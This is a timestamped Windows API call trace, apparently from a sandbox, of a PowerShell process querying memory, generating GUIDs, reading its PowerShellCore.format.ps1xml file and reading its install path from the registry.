	[0339.364] VirtualQuery (in: lpAddress=0x14bbd0, lpBuffer=0x14ca90, dwLength=0x30 | out: lpBuffer=0x14ca90*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.364] VirtualQuery (in: lpAddress=0x14bb30, lpBuffer=0x14c9f0, dwLength=0x30 | out: lpBuffer=0x14c9f0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.364] VirtualQuery (in: lpAddress=0x14bbc0, lpBuffer=0x14ca80, dwLength=0x30 | out: lpBuffer=0x14ca80*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.365] VirtualQuery (in: lpAddress=0x14bb30, lpBuffer=0x14c9f0, dwLength=0x30 | out: lpBuffer=0x14c9f0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.365] VirtualQuery (in: lpAddress=0x14bbc0, lpBuffer=0x14ca80, dwLength=0x30 | out: lpBuffer=0x14ca80*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.366] VirtualQuery (in: lpAddress=0x14bbc0, lpBuffer=0x14ca80, dwLength=0x30 | out: lpBuffer=0x14ca80*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.366] VirtualQuery (in: lpAddress=0x14bb30, lpBuffer=0x14c9f0, dwLength=0x30 | out: lpBuffer=0x14c9f0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.366] VirtualQuery (in: lpAddress=0x14bbc0, lpBuffer=0x14ca80, dwLength=0x30 | out: lpBuffer=0x14ca80*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.366] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x32dafd67, Data2=0xfe8, Data3=0x4f91, Data4=([0]=0x8c, [1]=0x66, [2]=0x7f, [3]=0xb0, [4]=0x92, [5]=0x9d, [6]=0xe1, [7]=0x1a))) returned 0x0
	[0339.366] VirtualQuery (in: lpAddress=0x14bb30, lpBuffer=0x14c9f0, dwLength=0x30 | out: lpBuffer=0x14c9f0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.366] VirtualQuery (in: lpAddress=0x14bbc0, lpBuffer=0x14ca80, dwLength=0x30 | out: lpBuffer=0x14ca80*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.367] VirtualQuery (in: lpAddress=0x14bb30, lpBuffer=0x14c9f0, dwLength=0x30 | out: lpBuffer=0x14c9f0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.367] VirtualQuery (in: lpAddress=0x14bbc0, lpBuffer=0x14ca80, dwLength=0x30 | out: lpBuffer=0x14ca80*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.367] VirtualQuery (in: lpAddress=0x14bbc0, lpBuffer=0x14ca80, dwLength=0x30 | out: lpBuffer=0x14ca80*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.367] VirtualQuery (in: lpAddress=0x14bb30, lpBuffer=0x14c9f0, dwLength=0x30 | out: lpBuffer=0x14c9f0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.367] VirtualQuery (in: lpAddress=0x14bbc0, lpBuffer=0x14ca80, dwLength=0x30 | out: lpBuffer=0x14ca80*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.367] VirtualQuery (in: lpAddress=0x14bb30, lpBuffer=0x14c9f0, dwLength=0x30 | out: lpBuffer=0x14c9f0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.367] VirtualQuery (in: lpAddress=0x14bbc0, lpBuffer=0x14ca80, dwLength=0x30 | out: lpBuffer=0x14ca80*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.367] VirtualQuery (in: lpAddress=0x14bb30, lpBuffer=0x14c9f0, dwLength=0x30 | out: lpBuffer=0x14c9f0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.367] VirtualQuery (in: lpAddress=0x14bbc0, lpBuffer=0x14ca80, dwLength=0x30 | out: lpBuffer=0x14ca80*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.368] VirtualQuery (in: lpAddress=0x14b800, lpBuffer=0x14c6c0, dwLength=0x30 | out: lpBuffer=0x14c6c0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.368] VirtualQuery (in: lpAddress=0x14bb30, lpBuffer=0x14c9f0, dwLength=0x30 | out: lpBuffer=0x14c9f0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.368] VirtualQuery (in: lpAddress=0x14bbc0, lpBuffer=0x14ca80, dwLength=0x30 | out: lpBuffer=0x14ca80*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.368] VirtualQuery (in: lpAddress=0x14bb30, lpBuffer=0x14c9f0, dwLength=0x30 | out: lpBuffer=0x14c9f0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.368] VirtualQuery (in: lpAddress=0x14bbc0, lpBuffer=0x14ca80, dwLength=0x30 | out: lpBuffer=0x14ca80*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.368] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x168ee272, Data2=0x4cd3, Data3=0x4738, Data4=([0]=0xbc, [1]=0x23, [2]=0x8a, [3]=0x50, [4]=0x52, [5]=0x5d, [6]=0xd6, [7]=0x4f))) returned 0x0
	[0339.368] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x719d7c01, Data2=0xc942, Data3=0x4e50, Data4=([0]=0xb7, [1]=0xb2, [2]=0x83, [3]=0xb5, [4]=0xcf, [5]=0x9e, [6]=0x52, [7]=0xb3))) returned 0x0
	[0339.369] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x43a77063, Data2=0x13f9, Data3=0x4bef, Data4=([0]=0xa3, [1]=0x96, [2]=0xce, [3]=0xdd, [4]=0xd8, [5]=0x76, [6]=0x68, [7]=0xbf))) returned 0x0
	[0339.369] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0xf55a3db8, Data2=0x78fd, Data3=0x4cdc, Data4=([0]=0xad, [1]=0x90, [2]=0xb0, [3]=0x64, [4]=0x11, [5]=0x47, [6]=0x3b, [7]=0x4e))) returned 0x0
	[0339.370] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x2698bf31, Data2=0x9627, Data3=0x4c75, Data4=([0]=0xb0, [1]=0x1e, [2]=0xa1, [3]=0x97, [4]=0xa3, [5]=0xb2, [6]=0x2c, [7]=0x82))) returned 0x0
	[0339.370] VirtualQuery (in: lpAddress=0x14b910, lpBuffer=0x14c7d0, dwLength=0x30 | out: lpBuffer=0x14c7d0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.370] VirtualQuery (in: lpAddress=0x14b9a0, lpBuffer=0x14c860, dwLength=0x30 | out: lpBuffer=0x14c860*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.370] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x4d611e4b, Data2=0x29f5, Data3=0x4c31, Data4=([0]=0x81, [1]=0x2f, [2]=0x7d, [3]=0xa9, [4]=0xc5, [5]=0x8e, [6]=0xfb, [7]=0x1a))) returned 0x0
	[0339.370] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x1775aaac, Data2=0x8491, Data3=0x44a3, Data4=([0]=0x81, [1]=0x73, [2]=0x83, [3]=0x70, [4]=0x84, [5]=0x5a, [6]=0xe4, [7]=0xee))) returned 0x0
	[0339.370] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x50ad5996, Data2=0x292c, Data3=0x406d, Data4=([0]=0xa3, [1]=0xbc, [2]=0xbf, [3]=0xa5, [4]=0x1c, [5]=0x8a, [6]=0x1b, [7]=0x4a))) returned 0x0
	[0339.371] SetErrorMode (uMode=0x1) returned 0x1
	[0339.371] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2e4
	[0339.371] SetErrorMode (uMode=0x1) returned 0x1
	[0339.371] GetFileType (hFile=0x2e4) returned 0x1
	[0339.371] ReadFile (in: hFile=0x2e4, lpBuffer=0x30694d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x30694d8*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0339.372] ReadFile (in: hFile=0x2e4, lpBuffer=0x30694d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x30694d8*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0339.372] ReadFile (in: hFile=0x2e4, lpBuffer=0x30694d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x30694d8*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0339.373] ReadFile (in: hFile=0x2e4, lpBuffer=0x30694d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x30694d8*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0339.373] ReadFile (in: hFile=0x2e4, lpBuffer=0x30694d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x30694d8*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0339.373] ReadFile (in: hFile=0x2e4, lpBuffer=0x30694d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x30694d8*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0339.373] ReadFile (in: hFile=0x2e4, lpBuffer=0x30694d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x30694d8*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0339.373] ReadFile (in: hFile=0x2e4, lpBuffer=0x30694d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x30694d8*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0339.373] ReadFile (in: hFile=0x2e4, lpBuffer=0x30694d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x30694d8*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0339.374] ReadFile (in: hFile=0x2e4, lpBuffer=0x30694d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x30694d8*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0339.374] ReadFile (in: hFile=0x2e4, lpBuffer=0x30694d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x30694d8*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0339.374] ReadFile (in: hFile=0x2e4, lpBuffer=0x30694d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x30694d8*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0339.374] ReadFile (in: hFile=0x2e4, lpBuffer=0x30694d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x30694d8*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0339.374] ReadFile (in: hFile=0x2e4, lpBuffer=0x30694d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x30694d8*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0339.374] ReadFile (in: hFile=0x2e4, lpBuffer=0x30694d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x30694d8*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0339.375] ReadFile (in: hFile=0x2e4, lpBuffer=0x30694d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x30694d8*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0339.375] ReadFile (in: hFile=0x2e4, lpBuffer=0x30694d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x30694d8*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0339.375] ReadFile (in: hFile=0x2e4, lpBuffer=0x30694d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x30694d8*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0339.375] ReadFile (in: hFile=0x2e4, lpBuffer=0x30694d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x30694d8*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0339.375] ReadFile (in: hFile=0x2e4, lpBuffer=0x30694d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x30694d8*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0339.376] ReadFile (in: hFile=0x2e4, lpBuffer=0x30694d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x30694d8*, lpNumberOfBytesRead=0x14d0f8*=0x1000, lpOverlapped=0x0) returned 1
	[0339.376] ReadFile (in: hFile=0x2e4, lpBuffer=0x30694d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x30694d8*, lpNumberOfBytesRead=0x14d0f8*=0xe67, lpOverlapped=0x0) returned 1
	[0339.376] ReadFile (in: hFile=0x2e4, lpBuffer=0x3068aa7, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x3068aa7*, lpNumberOfBytesRead=0x14d0f8*=0x0, lpOverlapped=0x0) returned 1
	[0339.376] ReadFile (in: hFile=0x2e4, lpBuffer=0x30694d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d0f8, lpOverlapped=0x0 | out: lpBuffer=0x30694d8*, lpNumberOfBytesRead=0x14d0f8*=0x0, lpOverlapped=0x0) returned 1
	[0339.376] SetErrorMode (uMode=0x1) returned 0x1
	[0339.376] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d0a0 | out: lpFileInformation=0x14d0a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0339.376] SetErrorMode (uMode=0x1) returned 0x1
	[0339.376] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d188 | out: phkResult=0x14d188*=0x2e4) returned 0x0
	[0339.377] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d10c, lpData=0x0, lpcbData=0x14d108*=0x0 | out: lpType=0x14d10c*=0x1, lpData=0x0, lpcbData=0x14d108*=0x56) returned 0x0
	[0339.377] CoTaskMemAlloc (cb=0x5a) returned 0x1b724740
	[0339.377] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d0dc, lpData=0x1b724740, lpcbData=0x14d0d8*=0x56 | out: lpType=0x14d0dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d0d8*=0x56) returned 0x0
	[0339.377] CoTaskMemFree (pv=0x1b724740) 
	[0339.377] RegCloseKey (hKey=0x2e4) returned 0x0
	[0339.378] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x3f48ec42, Data2=0x3731, Data3=0x4693, Data4=([0]=0x8d, [1]=0x28, [2]=0x83, [3]=0xe0, [4]=0x4f, [5]=0x89, [6]=0x7c, [7]=0x7d))) returned 0x0
	[0339.378] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x41c1ac68, Data2=0x3481, Data3=0x4c42, Data4=([0]=0x95, [1]=0xd8, [2]=0xc2, [3]=0xa0, [4]=0x60, [5]=0x4e, [6]=0xde, [7]=0x97))) returned 0x0
	[0339.379] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0xe8600793, Data2=0x76ed, Data3=0x4e00, Data4=([0]=0xaa, [1]=0x2e, [2]=0xd3, [3]=0x2, [4]=0xcd, [5]=0xc0, [6]=0xc1, [7]=0x9b))) returned 0x0
	[0339.379] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0xc1ed4626, Data2=0x6799, Data3=0x4737, Data4=([0]=0xba, [1]=0x4b, [2]=0x9, [3]=0xeb, [4]=0xde, [5]=0x5b, [6]=0x55, [7]=0x6c))) returned 0x0
	[0339.379] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0xf0f84dd7, Data2=0xdba7, Data3=0x4634, Data4=([0]=0x91, [1]=0xa9, [2]=0x21, [3]=0x3a, [4]=0x3, [5]=0x33, [6]=0x22, [7]=0xca))) returned 0x0
	[0339.379] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x9808adb3, Data2=0x871, Data3=0x4670, Data4=([0]=0x8f, [1]=0xb3, [2]=0x98, [3]=0x54, [4]=0x26, [5]=0xc9, [6]=0x18, [7]=0xb8))) returned 0x0
	[0339.380] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x85153055, Data2=0xb83b, Data3=0x4bf0, Data4=([0]=0xa3, [1]=0x1b, [2]=0xfe, [3]=0x3f, [4]=0xb2, [5]=0x71, [6]=0x98, [7]=0xc0))) returned 0x0
	[0339.380] VirtualQuery (in: lpAddress=0x14bd60, lpBuffer=0x14cc20, dwLength=0x30 | out: lpBuffer=0x14cc20*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.382] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x72aea7dd, Data2=0x3a34, Data3=0x44ab, Data4=([0]=0xa1, [1]=0xa0, [2]=0x97, [3]=0xec, [4]=0xa7, [5]=0xda, [6]=0xe, [7]=0x97))) returned 0x0
	[0339.726] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x75e4403e, Data2=0x591, Data3=0x4040, Data4=([0]=0xbb, [1]=0xa0, [2]=0xd5, [3]=0x28, [4]=0xce, [5]=0x7e, [6]=0xfd, [7]=0x76))) returned 0x0
	[0339.726] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0xda9b9165, Data2=0xe242, Data3=0x4a0a, Data4=([0]=0xbe, [1]=0x53, [2]=0xfe, [3]=0xf6, [4]=0x6, [5]=0xdb, [6]=0x1a, [7]=0x62))) returned 0x0
	[0339.726] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0xd7501765, Data2=0xf3db, Data3=0x4b28, Data4=([0]=0x89, [1]=0x51, [2]=0x3, [3]=0xc, [4]=0x8c, [5]=0xd, [6]=0x94, [7]=0xc9))) returned 0x0
	[0339.726] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0xa53d7aa0, Data2=0xfc67, Data3=0x4117, Data4=([0]=0x93, [1]=0xc2, [2]=0x9d, [3]=0xf9, [4]=0x7d, [5]=0x2b, [6]=0x58, [7]=0xf))) returned 0x0
	[0339.727] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x960c606a, Data2=0xb031, Data3=0x4a95, Data4=([0]=0x8f, [1]=0xc, [2]=0x97, [3]=0x27, [4]=0x75, [5]=0x1e, [6]=0x2a, [7]=0xf6))) returned 0x0
	[0339.727] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0xd0bfac78, Data2=0xc559, Data3=0x490f, Data4=([0]=0x8b, [1]=0x9e, [2]=0xe9, [3]=0xb2, [4]=0xd5, [5]=0x71, [6]=0x45, [7]=0x6b))) returned 0x0
	[0339.727] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x40ac3ab8, Data2=0xb329, Data3=0x4339, Data4=([0]=0xa1, [1]=0xa9, [2]=0xea, [3]=0x3a, [4]=0x4f, [5]=0x13, [6]=0xb7, [7]=0x6a))) returned 0x0
	[0339.727] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0xd24d4bc2, Data2=0x40a, Data3=0x4949, Data4=([0]=0x94, [1]=0x38, [2]=0xa6, [3]=0x7f, [4]=0x1, [5]=0xe7, [6]=0x4b, [7]=0x73))) returned 0x0
	[0339.727] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x78468b79, Data2=0xbca1, Data3=0x47bd, Data4=([0]=0xba, [1]=0xde, [2]=0x1e, [3]=0x96, [4]=0x95, [5]=0x5d, [6]=0x6f, [7]=0xe7))) returned 0x0
	[0339.727] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0xff2370d6, Data2=0x54e5, Data3=0x46be, Data4=([0]=0x81, [1]=0x5f, [2]=0x95, [3]=0x1d, [4]=0x24, [5]=0x22, [6]=0x9, [7]=0xd0))) returned 0x0
	[0339.728] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0x1a48abf9, Data2=0x8d54, Data3=0x4f36, Data4=([0]=0x97, [1]=0x66, [2]=0xcb, [3]=0xf1, [4]=0x76, [5]=0xc0, [6]=0x46, [7]=0xbf))) returned 0x0
	[0339.728] VirtualQuery (in: lpAddress=0x14bd60, lpBuffer=0x14cc20, dwLength=0x30 | out: lpBuffer=0x14cc20*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.728] VirtualQuery (in: lpAddress=0x14bd60, lpBuffer=0x14cc20, dwLength=0x30 | out: lpBuffer=0x14cc20*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.728] VirtualQuery (in: lpAddress=0x14bd60, lpBuffer=0x14cc20, dwLength=0x30 | out: lpBuffer=0x14cc20*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0339.728] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0xad4a8ee0, Data2=0x34c8, Data3=0x482d, Data4=([0]=0x9a, [1]=0x3c, [2]=0xde, [3]=0x9e, [4]=0xff, [5]=0x9e, [6]=0x3d, [7]=0xb8))) returned 0x0
	[0339.729] CoCreateGuid (in: pguid=0x14d3b0 | out: pguid=0x14d3b0*(Data1=0xd55005f2, Data2=0x4e48, Data3=0x4139, Data4=([0]=0xbc, [1]=0x54, [2]=0x6, [3]=0x73, [4]=0x1, [5]=0x54, [6]=0x31, [7]=0x9f))) returned 0x0
